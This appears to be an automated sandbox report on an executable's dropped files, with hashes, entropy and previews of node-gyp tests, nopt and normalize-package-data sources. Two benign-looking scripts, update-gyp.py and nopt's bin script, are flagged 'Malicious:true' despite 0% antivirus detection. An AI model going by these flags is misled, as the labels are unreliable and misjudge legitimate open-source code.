              MD5:DDF37CC00032C3A4BA24809D79D5B974
              SHA1:4C8136DE90C58207B912103AC380A6A99E95EFEE
              SHA-256:274559F1AD733AFC7595D2C9D7BAB5B21E6B347AB8E9C8AEE6D4A20E35236E8A
              SHA-512:DD199597463FAF1AF763F46D705773DC7E39404E3C259DA73C43CED02392F4562CAD6B89532ABE57061F2FB96F7BFD2BB98C9BEFF4DFE9055C55EFAA4C9F6AE6
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { describe, it } = require('mocha').const assert = require('assert').const path = require('path').const requireInject = require('require-inject').const configure = requireInject('../lib/configure', {. 'graceful-fs': {. closeSync: function () { return undefined },. openSync: function (path) {. if (readableFiles.some(function (f) { return f === path })) {. return 0. } else {. var error = new Error('ENOENT - not found'). throw error. }. }. }.})..const dir = path.sep + 'testdir'.const readableFile = 'readable_file'.const anotherReadableFile = 'another_readable_file'.const readableFileInDir = 'somedir' + path.sep + readableFile.const readableFiles = [. path.resolve(dir, readableFile),. path.resolve(dir, anotherReadableFile),. path.resolve(dir, readableFileInDir).]..describe('find-accessible-sync', function () {. it('find accessible - empty array', function () {. var candidates = []. var found = configure.test.findA
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4504
              Entropy (8bit):4.693447418671352
              Encrypted:false
              SSDEEP:
              MD5:0560FEAFD986C85B9659BD917B0C1B73
              SHA1:1A55ADB633F940AECE859F51ADCB4EE07FFF0C98
              SHA-256:0BAF543144C8B2228A147059E61B16344001CE171F7376B830C5CE5917785699
              SHA-512:05DC74A0A2A12C16DBF1FFDFB2A7701DA55FDCAAFB647C7CD7525261F573460A3C1D9538AC27D97859808AF146FA182E037EF424006F8DA040FDB1458A533038
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { describe, it } = require('mocha').const assert = require('assert').const path = require('path').const findNodeDirectory = require('../lib/find-node-directory')..const platforms = ['darwin', 'freebsd', 'linux', 'sunos', 'win32', 'aix', 'os400']..describe('find-node-directory', function () {. // we should find the directory based on the directory. // the script is running in and it should match the layout. // in a build tree where npm is installed in. // .... /deps/npm. it('test find-node-directory - node install', function () {. for (var next = 0; next < platforms.length; next++) {. var processObj = { execPath: '/x/y/bin/node', platform: platforms[next] }. assert.strictEqual(. findNodeDirectory('/x/deps/npm/node_modules/node-gyp/lib', processObj),. path.join('/x')). }. }).. // we should find the directory based on the directory. // the script is running in and it should match the layout. // in an installed tree where npm is in
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):6196
              Entropy (8bit):4.677901206065606
              Encrypted:false
              SSDEEP:
              MD5:78E9087C0B993345D9A13A1F96193E0B
              SHA1:F243736A0F55E0CC007EF6D096A8CC408FB5B1B8
              SHA-256:AEEA95F63F6DEEBF26DC1F2B0E263809DB938E641C79AAFEDFBFD033729AFC98
              SHA-512:0494C2055D33FC952EB99270AF5467739699C63EEB582BEF1560558DC968FEE0CA6B166FCBB0647EB8978ACCB028106C2701D9137FA9733CF7958CFCA67B7159
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..delete process.env.PYTHON..const { describe, it } = require('mocha').const assert = require('assert').const findPython = require('../lib/find-python').const execFile = require('child_process').execFile.const PythonFinder = findPython.test.PythonFinder..require('npmlog').level = 'warn'..describe('find-python', function () {. it('find python', function () {. findPython.test.findPython(null, function (err, found) {. assert.strictEqual(err, null). var proc = execFile(found, ['-V'], function (err, stdout, stderr) {. assert.strictEqual(err, null). assert.ok(/Python 3/.test(stdout)). assert.strictEqual(stderr, ''). }). proc.stdout.setEncoding('utf-8'). proc.stderr.setEncoding('utf-8'). }). }).. function poison (object, property) {. function fail () {. console.error(Error(`Property ${property} should not have been accessed.`)). process.abort(). }. var descriptor = {. configurable: false,. enumerab
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):22847
              Entropy (8bit):4.964514488134081
              Encrypted:false
              SSDEEP:
              MD5:64207D8B3AB616BAB93297666798BCD5
              SHA1:45273B7AE068C129A4DFFB441979045841CFC632
              SHA-256:5CFDA8445B5D53D0C6E2E93746DED852F87E545E320FC7498643C0D62EFA14AA
              SHA-512:A3BE7A7D8DDC47C4169F54A09AFBA4D5514D4F69DA3A64BF7CAF845FE406F8E05ABABF914440DA5606EFCDA28A7941C0DB5D39BF30317AA3AC1CB4DE7D3E9EE1
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { describe, it } = require('mocha').const assert = require('assert').const fs = require('fs').const path = require('path').const findVisualStudio = require('../lib/find-visualstudio').const VisualStudioFinder = findVisualStudio.test.VisualStudioFinder..const semverV1 = { major: 1, minor: 0, patch: 0 }..delete process.env.VCINSTALLDIR..function poison (object, property) {. function fail () {. console.error(Error(`Property ${property} should not have been accessed.`)). process.abort(). }. var descriptor = {. configurable: false,. enumerable: false,. get: fail,. set: fail. }. Object.defineProperty(object, property, descriptor).}..function TestVisualStudioFinder () { VisualStudioFinder.apply(this, arguments) }.TestVisualStudioFinder.prototype = Object.create(VisualStudioFinder.prototype).// Silence npmlog - remove for debugging.TestVisualStudioFinder.prototype.log = {. silly: () => {},. verbose: () => {},. info: () => {},. warn: () => {},. er
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):3699
              Entropy (8bit):4.677004271132863
              Encrypted:false
              SSDEEP:
              MD5:2B11AE20FB5E17479291419981D87BA9
              SHA1:ECFE4E89989F1056736CEFCB025BCE23FC590E21
              SHA-256:26209E11D4923D16D9F3FE0F82EA824FD3F55EA1FB03EDDD7409C5023AC53144
              SHA-512:31BA0977B7A5C5CDCE923113DC7615F1D5EAC28701916E52B30D25A2AE27396B513D536A6A9894DF4C5CAFAA4E89F84A69EB1F125C65F4FA193358DF0623FED0
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { describe, it, after } = require('mocha').const assert = require('assert').const path = require('path').const os = require('os').const util = require('util').const { test: { download, install } } = require('../lib/install').const rimraf = require('rimraf').const gyp = require('../lib/node-gyp').const log = require('npmlog').const semver = require('semver').const stream = require('stream').const streamPipeline = util.promisify(stream.pipeline)..log.level = 'error' // we expect a warning..describe('install', function () {. it('EACCES retry once', async () => {. const fs = {. promises: {. stat (_) {. const err = new Error(). err.code = 'EACCES'. assert.ok(true). throw err. }. }. }.. const Gyp = {. devDir: __dirname,. opts: {. ensure: true. },. commands: {. install (argv, cb) {. install(fs, Gyp, argv).then(cb, cb). },. remove (_, cb) {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1289
              Entropy (8bit):4.777730028791134
              Encrypted:false
              SSDEEP:
              MD5:62CF449CE27A44A4BBCE780BB00089B3
              SHA1:4CC308CACAEF532B3E155EF46FB43AEED7AC7E5A
              SHA-256:23FB821FC3E8F32D557054DE7894837B38BFE76A295009A51289DFADD2BEE278
              SHA-512:4D8C89019CF909622ACE0A97F516D863CC95788D0AB4BE22FAD20C7FD6BC8F343124F70AD560A778E61F6B605495AE146316AD3B0CC33200F6FD6CEC2EBBE78F
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { describe, it } = require('mocha').const assert = require('assert').const gyp = require('../lib/node-gyp')..describe('options', function () {. it('options in environment', () => {. // `npm test` dumps a ton of npm_config_* variables in the environment.. Object.keys(process.env). .filter((key) => /^npm_config_/.test(key)). .forEach((key) => { delete process.env[key] }).. // in some platforms, certain keys are stubborn and cannot be removed. const keys = Object.keys(process.env). .filter((key) => /^npm_config_/.test(key)). .map((key) => key.substring('npm_config_'.length)). .concat('argv', 'x').. // Zero-length keys should get filtered out.. process.env.npm_config_ = '42'. // Other keys should get added.. process.env.npm_config_x = '42'. // Except loglevel.. process.env.npm_config_loglevel = 'debug'.. const g = gyp(). g.parseArgv(['rebuild']) // Also sets opts.argv... assert.deepStrictEqual(Object.keys(
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):18705
              Entropy (8bit):4.999780475013047
              Encrypted:false
              SSDEEP:
              MD5:3C146761D208B4B4996EF4624E98D25F
              SHA1:8D861EE4D6E4A6B5F34FD7B4F9EC30656E1DC99C
              SHA-256:ABD6A1113AAFC7EB1B84AD5B97EBAA0BECB290A84442FA15766DF80ACBB9A3FC
              SHA-512:9B14724EA83C041A89F5120F44CF485A29A1DFAD52580C2ACB7D9485E469C74C1C3BEB562216C3236E2F20D12F298F70ECAF7C2E1511E8B4A5CBBF9ADF6B9403
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const { describe, it } = require('mocha').const assert = require('assert').const processRelease = require('../lib/process-release')..describe('process-release', function () {. it('test process release - process.version = 0.8.20', function () {. var release = processRelease([], { opts: {} }, 'v0.8.20', null).. assert.strictEqual(release.semver.version, '0.8.20'). delete release.semver.. assert.deepStrictEqual(release, {. version: '0.8.20',. name: 'node',. baseUrl: 'https://nodejs.org/dist/v0.8.20/',. tarballUrl: 'https://nodejs.org/dist/v0.8.20/node-v0.8.20.tar.gz',. shasumsUrl: 'https://nodejs.org/dist/v0.8.20/SHASUMS256.txt',. versionDir: '0.8.20',. ia32: { libUrl: 'https://nodejs.org/dist/v0.8.20/node.lib', libPath: 'node.lib' },. x64: { libUrl: 'https://nodejs.org/dist/v0.8.20/x64/node.lib', libPath: 'x64/node.lib' },. arm64: { libUrl: 'https://nodejs.org/dist/v0.8.20/arm64/node.lib', libPath: 'arm64/node.lib' }
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Python script, ASCII text executable
              Category:dropped
              Size (bytes):2337
              Entropy (8bit):4.8477986696853455
              Encrypted:false
              SSDEEP:
              MD5:BCAA795678870DF9CD345993EF211924
              SHA1:92C1F38D3201F79C2086076A100D7F3A62085947
              SHA-256:033CFBACCE37062E0C925BA9285B9DC068CBC6423EF38E734FE9DCC462C4EA1E
              SHA-512:C0067DE24294FD9436C032087E3638FB23A48242E102828DC685512BE8E10FE65C001978B8785C1B33866E1BE381E94DA321D7E7B92C5E7188C07EE79C9B1614
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/usr/bin/env python3..import argparse.import os.import shutil.import subprocess.import tarfile.import tempfile.import urllib.request..BASE_URL = "https://github.com/nodejs/gyp-next/archive/".CHECKOUT_PATH = os.path.dirname(os.path.realpath(__file__)).CHECKOUT_GYP_PATH = os.path.join(CHECKOUT_PATH, "gyp")..parser = argparse.ArgumentParser().parser.add_argument("tag", help="gyp tag to update to").args = parser.parse_args()..tar_url = BASE_URL + args.tag + ".tar.gz"..changed_files = subprocess.check_output(["git", "diff", "--name-only"]).strip().if changed_files:. raise Exception("Can't update gyp while you have uncommitted changes in node-gyp")..with tempfile.TemporaryDirectory() as tmp_dir:. tar_file = os.path.join(tmp_dir, "gyp.tar.gz"). unzip_target = os.path.join(tmp_dir, "gyp"). with open(tar_file, "wb") as f:. print("Downloading gyp-next@" + args.tag + " into temporary directory..."). print("From: " + tar_url). with urllib.request.urlopen(tar_url)
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:a /usr/bin/env node script, ASCII text executable
              Category:dropped
              Size (bytes):644
              Entropy (8bit):4.750796187949791
              Encrypted:false
              SSDEEP:
              MD5:FC51DE68CA7EE2E22F5B855A57164AA2
              SHA1:9F96A87A2098AFC6885771D54BA333DCCAE3C89B
              SHA-256:95527C67AC7A1E294F7FCB09E648D1E454F6CFEF06346A18A297173389B97D21
              SHA-512:9AD98ABCE255E5EAA6E6B45232BA96E4BC18585993E8564C552FD801501D7522DE2C0254B778EFCA93D6A1CDE7B3F2A5C44014FC02B12E537E2437AADEDD3BBA
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:#!/usr/bin/env node.const nopt = require('../lib/nopt').const path = require('path').console.log('parsed', nopt({. num: Number,. bool: Boolean,. help: Boolean,. list: Array,. 'num-list': [Number, Array],. 'str-list': [String, Array],. 'bool-list': [Boolean, Array],. str: String,. clear: Boolean,. config: Boolean,. length: Number,. file: path,.}, {. s: ['--str', 'astring'],. b: ['--bool'],. nb: ['--no-bool'],. tft: ['--bool-list', '--no-bool-list', '--bool-list', 'true'],. '?': ['--help'],. h: ['--help'],. H: ['--help'],. n: ['--num', '125'],. c: ['--config'],. l: ['--length'],. f: ['--file'],.}, process.argv, 2)).
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):140
              Entropy (8bit):4.899644981845467
              Encrypted:false
              SSDEEP:
              MD5:D83FAD8F1EA678A912A805E3041FC9A5
              SHA1:278F2BEBB109864BE2ADF402E5691E43B609EF5F
              SHA-256:55D6C35C14CDEB6A02D6E29887AD7B61C49CEF2533388DA2BD0FE826AF33D157
              SHA-512:8F8DFAF58BEA0917ECF9394D768481CCFD5A2783441F92DC1BFE571E9D5E87455AFFDB680BD120923F11540832A95DEC260ED7E634EFFCBD0E3A73D147BFF577
              Malicious:false
              Reputation:unknown
              Preview:/* istanbul ignore next */.module.exports = process.env.DEBUG_NOPT || process.env.NOPT_DEBUG. ? (...a) => console.error(...a). : () => {}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):12818
              Entropy (8bit):4.638244472033424
              Encrypted:false
              SSDEEP:
              MD5:B281F9FC5EE3886B21A24E8EC43BBCE8
              SHA1:01F0FF9B017494602A9A41340C342529538F3482
              SHA-256:46EB5C53281D7CC89FC496F3D52AB2CD7E8C2BFBEB8947713C1B262E5E213B3D
              SHA-512:3921942EE67B0E10E9667AEFB6F4052944FAF08DF91B8D199728B1B4A80E3639E4220D4BA07F739A28DDB80B0E4F4CB3F4456E3D1DD03E631D4797413B0853CB
              Malicious:false
              Reputation:unknown
              Preview:const abbrev = require('abbrev').const debug = require('./debug').const defaultTypeDefs = require('./type-defs')..const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k)..const getType = (k, { types, dynamicTypes }) => {. let hasType = hasOwn(types, k). let type = types[k]. if (!hasType && typeof dynamicTypes === 'function') {. const matchedType = dynamicTypes(k). if (matchedType !== undefined) {. type = matchedType. hasType = true. }. }. return [hasType, type].}..const isTypeDef = (type, def) => def && type === def.const hasTypeDef = (type, def) => def && type.indexOf(def) !== -1.const doesNotHaveTypeDef = (type, def) => def && !hasTypeDef(type, def)..function nopt (args, {. types,. shorthands,. typeDefs,. invalidHandler,. typeDefault,. dynamicTypes,.} = {}) {. debug(types, shorthands, args, typeDefs).. const data = {}. const argv = {. remain: [],. cooked: args,. original: args.slice(0),. }.. parse(args, data, argv.remain, { type
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):955
              Entropy (8bit):4.75376611785256
              Encrypted:false
              SSDEEP:
              MD5:EF83336A651C0243AAF8DADB94EAD71C
              SHA1:46A586211B8CA69D14E81B2D30F0F5D5EF23085A
              SHA-256:4615452255034A9B722B25A372C0C4ED04EDA2E4BF4C54B840BFAD564B9A4255
              SHA-512:F5BAD5DD237F093928C5C2F9E504DC760D1305E528053684BFB048DA83B6C1C5F46F242A5F13D54D5A2FE6D60B22516871D12910AE9596F074D8A7ABF9C20797
              Malicious:false
              Reputation:unknown
              Preview:const lib = require('./nopt-lib').const defaultTypeDefs = require('./type-defs')..// This is the version of nopt's API that requires setting typeDefs and invalidHandler.// on the required `nopt` object since it is a singleton. To not do a breaking change.// an API that requires all options be passed in is located in `nopt-lib.js` and.// exported here as lib..// TODO(breaking): make API only work in non-singleton mode..module.exports = exports = nopt.exports.clean = clean.exports.typeDefs = defaultTypeDefs.exports.lib = lib..function nopt (types, shorthands, args = process.argv, slice = 2) {. return lib.nopt(args.slice(slice), {. types: types || {},. shorthands: shorthands || {},. typeDefs: exports.typeDefs,. invalidHandler: exports.invalidHandler,. }).}..function clean (data, types, typeDefs = exports.typeDefs) {. return lib.clean(data, {. types: types || {},. typeDefs,. invalidHandler: exports.invalidHandler,. }).}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2030
              Entropy (8bit):4.746002710404561
              Encrypted:false
              SSDEEP:
              MD5:BA890022093F522E8F9E8C508B871FE3
              SHA1:0DFC4749EC84E39539A2AD78DC0D1B0D0E4AEFB7
              SHA-256:230FEE3A48E92B863C5D2D9D62E5C8DE020CDB636037CD589730DDEBE221C902
              SHA-512:B20D1AF635964B9C43A814F7FD877A51B797911C07E34743310DDECFC5C53D3E22E0A63F46C05BC998BB9F48899B93E7DFB4B51555A8506AEBBACADEE11B0CF8
              Malicious:false
              Reputation:unknown
              Preview:const url = require('url').const path = require('path').const Stream = require('stream').Stream.const os = require('os').const debug = require('./debug')..function validateString (data, k, val) {. data[k] = String(val).}..function validatePath (data, k, val) {. if (val === true) {. return false. }. if (val === null) {. return true. }.. val = String(val).. const isWin = process.platform === 'win32'. const homePattern = isWin ? /^~(\/|\\)/ : /^~\//. const home = os.homedir().. if (home && val.match(homePattern)) {. data[k] = path.resolve(home, val.slice(2)). } else {. data[k] = path.resolve(val). }. return true.}..function validateNumber (data, k, val) {. debug('validate Number %j %j %j', k, val, isNaN(val)). if (isNaN(val)) {. return false. }. data[k] = +val.}..function validateDate (data, k, val) {. const s = Date.parse(val). debug('validate Date %j %j %j', k, val, s). if (isNaN(s)) {. return false. }. data[k] = new Date(val).}..function validate
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1167
              Entropy (8bit):4.692297037191272
              Encrypted:false
              SSDEEP:
              MD5:89555F8C0BBF67788F96C1C07781AE68
              SHA1:A98E85E87D691DE3A50EFC67AE6457049E89E47A
              SHA-256:129D5075468782B1A82C61B840B377EBDE322AA48490F421A3DCCD4E5AB7FC24
              SHA-512:79C02ECAC7101CA5A0A18483B4D077E6BF309588A09A655ECCFAC2B71CC9BEFD6ECDC6ABE364C6F361D85D6AD6D73CF55B03829E179BB9524A077F56C4B5ED66
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "nopt",. "version": "7.2.0",. "description": "Option parsing for Node, supporting types, shorthands, etc. Used by npm.",. "author": "GitHub Inc.",. "main": "lib/nopt.js",. "scripts": {. "test": "tap",. "lint": "eslint \"**/*.js\"",. "postlint": "template-oss-check",. "template-oss-apply": "template-oss-apply --force",. "lintfix": "npm run lint -- --fix",. "snap": "tap",. "posttest": "npm run lint". },. "repository": {. "type": "git",. "url": "https://github.com/npm/nopt.git". },. "bin": {. "nopt": "bin/nopt.js". },. "license": "ISC",. "dependencies": {. "abbrev": "^2.0.0". },. "devDependencies": {. "@npmcli/eslint-config": "^4.0.0",. "@npmcli/template-oss": "4.15.1",. "tap": "^16.3.0". },. "tap": {. "nyc-arg": [. "--exclude",. "tap-snapshots/**". ]. },. "files": [. "bin/",. "lib/". ],. "engines": {. "node": "^14.17.0 || ^16.13.0 || >=18.0.0". },. "templateOSS": {. "//@npmcli/template
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text, with very long lines (755)
              Category:dropped
              Size (bytes):1403
              Entropy (8bit):5.1203493554059305
              Encrypted:false
              SSDEEP:
              MD5:D1BCFC4226560B085978F38C2581CE74
              SHA1:7F91FA2168F9FA91712D0F65EE16FB2A464DE7CE
              SHA-256:A5F6F572F26172E1289F2F769CD93ACF63AE90DCBB71A9F4953CED871AB38544
              SHA-512:C759B3D67C9ED4605614877FDE13DDD80BAD71CD4DCEBB2011716FFA01077267245DD7847DCEF1BBD0D81C638B60B90CF600B771D04EDCE67F50EA86230E10A7
              Malicious:false
              Reputation:unknown
              Preview:This package contains code originally written by Isaac Z. Schlueter..Used with permission...Copyright (c) Meryn Stol ("Author").All rights reserved...The BSD License..Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:..1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):549
              Entropy (8bit):4.700019204362263
              Encrypted:false
              SSDEEP:
              MD5:C5E821DBDB6161C36AF8F4E675B5C270
              SHA1:0EC32E1867685898C0B8085F88342D3EC2FD085B
              SHA-256:929CAE46BA0B3B1E96C598F3186EDB9E3FA934078E6F229FFFEF8CB045107554
              SHA-512:8CFCA30C08760EE0D9836584A2F1C86713A3BB8AB3E4F5915A9F473FCED7E46614943A5BF3F2D41205B01DCBF0F32B6AD702FD9DD0ACCB9432E64D9D2F183CBA
              Malicious:false
              Reputation:unknown
              Preview:module.exports = extractDescription..// Extracts description from contents of a readme file in markdown format.function extractDescription (d) {. if (!d) {. return. }. if (d === 'ERROR: No README data found!') {. return. }. // the first block of text before the first heading. // that isn't the first line heading. d = d.trim().split('\n'). let s = 0. while (d[s] && d[s].trim().match(/^(#|$)/)) {. s++. }. const l = d.length. let e = s + 1. while (e < l && d[e].trim()) {. e++. }. return d.slice(s, e).join(' ').trim().}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):12706
              Entropy (8bit):4.6969316040902696
              Encrypted:false
              SSDEEP:
              MD5:37D220E9786766F10549CBC9A19CE7BB
              SHA1:F3DFEF11D5958972CAF251411C5E386F9B44DD54
              SHA-256:9E5B9EC2D6FA597D4E4C588BB13FA290B3156058C14C0E5A75F70B014E18015D
              SHA-512:0D265FE739D60AABBA60FDC0791DAAFCC8FC65AA168F70DAD19E7D63A9D73D1FAD6BBFEA4AF2F3E41957009572E358F9537DB82683CCCF3B97A2911C86D9A7A2
              Malicious:false
              Reputation:unknown
              Preview:var isValidSemver = require('semver/functions/valid').var cleanSemver = require('semver/functions/clean').var validateLicense = require('validate-npm-package-license').var hostedGitInfo = require('hosted-git-info').var isBuiltinModule = require('is-core-module').var depTypes = ['dependencies', 'devDependencies', 'optionalDependencies'].var extractDescription = require('./extract_description').var url = require('url').var typos = require('./typos.json')..var isEmail = str => str.includes('@') && (str.indexOf('@') < str.lastIndexOf('.'))..module.exports = {. // default warning function. warn: function () {},.. fixRepositoryField: function (data) {. if (data.repositories) {. this.warn('repositories'). data.repository = data.repositories[0]. }. if (!data.repository) {. return this.warn('missingRepository'). }. if (typeof data.repository === 'string') {. data.repository = {. type: 'git',. url: data.repository,. }. }. var r = dat
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):711
              Entropy (8bit):4.807045061381103
              Encrypted:false
              SSDEEP:
              MD5:6AB8C375EBA863A1B9C94F7365B0369E
              SHA1:4EA98B938C36F92734F701C435577F3FB60FBE17
              SHA-256:4C0E5AE69E7554BB56CE269A4E81B3D5069B294F907A20E444E41A288B1C2946
              SHA-512:CBF3C9D45D6CB5ED8C81B0BB5FC630FDAC06D43019700D14736763DA6AA5169406404C2B1082F102BF350AE7AD361D04C4257EF8152AF52A9AB8A1376F526728
              Malicious:false
              Reputation:unknown
              Preview:var util = require('util').var messages = require('./warning_messages.json')..module.exports = function () {. var args = Array.prototype.slice.call(arguments, 0). var warningName = args.shift(). if (warningName === 'typo') {. return makeTypoWarning.apply(null, args). } else {. var msgTemplate = messages[warningName] ? messages[warningName] : warningName + ": '%s'". args.unshift(msgTemplate). return util.format.apply(null, args). }.}..function makeTypoWarning (providedName, probableName, field) {. if (field) {. providedName = field + "['" + providedName + "']". probableName = field + "['" + probableName + "']". }. return util.format(messages.typo, providedName, probableName).}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1383
              Entropy (8bit):4.89847746394179
              Encrypted:false
              SSDEEP:
              MD5:E8AFDFCD276F1E9AB97AF62C0999674A
              SHA1:069A11F476264D2DF183511198BD0AC40CCF7AE5
              SHA-256:BBD4106306DCDCF75493C9F41F5ED948BD86FF86D62E75917C8D5D9D5FAB3B54
              SHA-512:5DF944DD53736CD3950B7275F69D274F7A2F89768D77EC374D03D61EA2AD03D4ADDA69EE23EAD90C543EE81748BD0161CEB2F1A9830EE0E86A49770E45365908
              Malicious:false
              Reputation:unknown
              Preview:module.exports = normalize..var fixer = require('./fixer').normalize.fixer = fixer..var makeWarning = require('./make_warning')..var fieldsToFix = ['name', 'version', 'description', 'repository', 'modules', 'scripts',. 'files', 'bin', 'man', 'bugs', 'keywords', 'readme', 'homepage', 'license'].var otherThingsToFix = ['dependencies', 'people', 'typos']..var thingsToFix = fieldsToFix.map(function (fieldName) {. return ucFirst(fieldName) + 'Field'.}).// two ways to do this in CoffeeScript on only one line, sub-70 chars:.// thingsToFix = fieldsToFix.map (name) -> ucFirst(name) + "Field".// thingsToFix = (ucFirst(name) + "Field" for name in fieldsToFix).thingsToFix = thingsToFix.concat(otherThingsToFix)..function normalize (data, warn, strict) {. if (warn === true) {. warn = null. strict = true. }. if (!strict) {. strict = false. }. if (!warn || data.private) {. warn = function (msg) { /* noop */ }. }.. if (data.scripts &&. data.scripts.install === 'node-gyp rebuil
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):262
              Entropy (8bit):4.620893982068647
              Encrypted:false
              SSDEEP:
              MD5:5931099F61732BFF2E70E544D0DA27BC
              SHA1:4AC188B481593A3A403B1BDEB7BE77A5084351BB
              SHA-256:FEDF560CADE701C950577804C7D4ED77642C8BF49977A16671521A0276CEF2EA
              SHA-512:2CA1DD15AFB32A5804937A90AFFEF08C48D8E1A3670E6EC4590A75DAF702B3D3A234A565D5A8E2E78AC173982F17D918977CDE94419BC32907B7060AD249BCBF
              Malicious:false
              Reputation:unknown
              Preview:var util = require('util')..module.exports = function () {. var args = Array.prototype.slice.call(arguments, 0). args.forEach(function (arg) {. if (!arg) {. throw new TypeError('Bad arguments.'). }. }). return util.format.apply(null, arguments).}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):747
              Entropy (8bit):4.251195954432444
              Encrypted:false
              SSDEEP:
              MD5:8598638C133C563F5322EBA9C17BE4FC
              SHA1:331A67072A95F1B581795DBC3D57BF7A8CD57384
              SHA-256:AA8FD1A11B9CE3CB523B3E913ED2A514C6C6AFC13BD581A13D7B4211BB514A25
              SHA-512:22B7E137F68924C569D8270CF0FDF5C0B8903ED0C98A18B0F9BFD566C35498A36E26FE42A4250B384BD5A4B932C6CA3AAAFD24F20ED130C9BF88504E5AE25935
              Malicious:false
              Reputation:unknown
              Preview:{. "topLevel": {. "dependancies": "dependencies". ,"dependecies": "dependencies". ,"depdenencies": "dependencies". ,"devEependencies": "devDependencies". ,"depends": "dependencies". ,"dev-dependencies": "devDependencies". ,"devDependences": "devDependencies". ,"devDepenencies": "devDependencies". ,"devdependencies": "devDependencies". ,"repostitory": "repository". ,"repo": "repository". ,"prefereGlobal": "preferGlobal". ,"hompage": "homepage". ,"hampage": "homepage". ,"autohr": "author". ,"autor": "author". ,"contributers": "contributors". ,"publicationConfig": "publishConfig". ,"script": "scripts". },. "bugs": { "web": "url", "name": "url" },. "script": { "server": "start", "tests": "test" }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1798
              Entropy (8bit):4.702695881097899
              Encrypted:false
              SSDEEP:
              MD5:20E768E3962566757A16C67D7AD22991
              SHA1:CBB7B6F08A36FE523E925E39A3AAC5647B22D910
              SHA-256:8D477C902B2BCD8D8152A6ABC663B2ACD43CAF41C64CA989DCFC3E5D0B75B641
              SHA-512:3A623F31424AFB43627DBB72766D9156A29D11432EB9EF329F84730F7EA09DD5AEBB47F5451EE95899D828A0A95B5A9CE0B8F788A7D3FED0CFE2C79E7D0CCDA5
              Malicious:false
              Reputation:unknown
              Preview:{. "repositories": "'repositories' (plural) Not supported. Please pick one as the 'repository' field". ,"missingRepository": "No repository field.". ,"brokenGitUrl": "Probably broken git url: %s". ,"nonObjectScripts": "scripts must be an object". ,"nonStringScript": "script values must be string commands". ,"nonArrayFiles": "Invalid 'files' member". ,"invalidFilename": "Invalid filename in 'files' list: %s". ,"nonArrayBundleDependencies": "Invalid 'bundleDependencies' list. Must be array of package names". ,"nonStringBundleDependency": "Invalid bundleDependencies member: %s". ,"nonDependencyBundleDependency": "Non-dependency in bundleDependencies: %s". ,"nonObjectDependencies": "%s field must be an object". ,"nonStringDependency": "Invalid dependency: %s %s". ,"deprecatedArrayDependencies": "specifying %s as array is deprecated". ,"deprecatedModules": "modules field is deprecated". ,"nonArrayKeywords": "keywords should be an array of strings". ,"nonStringKeyword": "keyw
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1474
              Entropy (8bit):4.693389052629679
              Encrypted:false
              SSDEEP:
              MD5:C5CC497DFB3E1EA3463EA63613122E3B
              SHA1:55BB91E9C7A6C46B0D8EC46021524547AA3CD31C
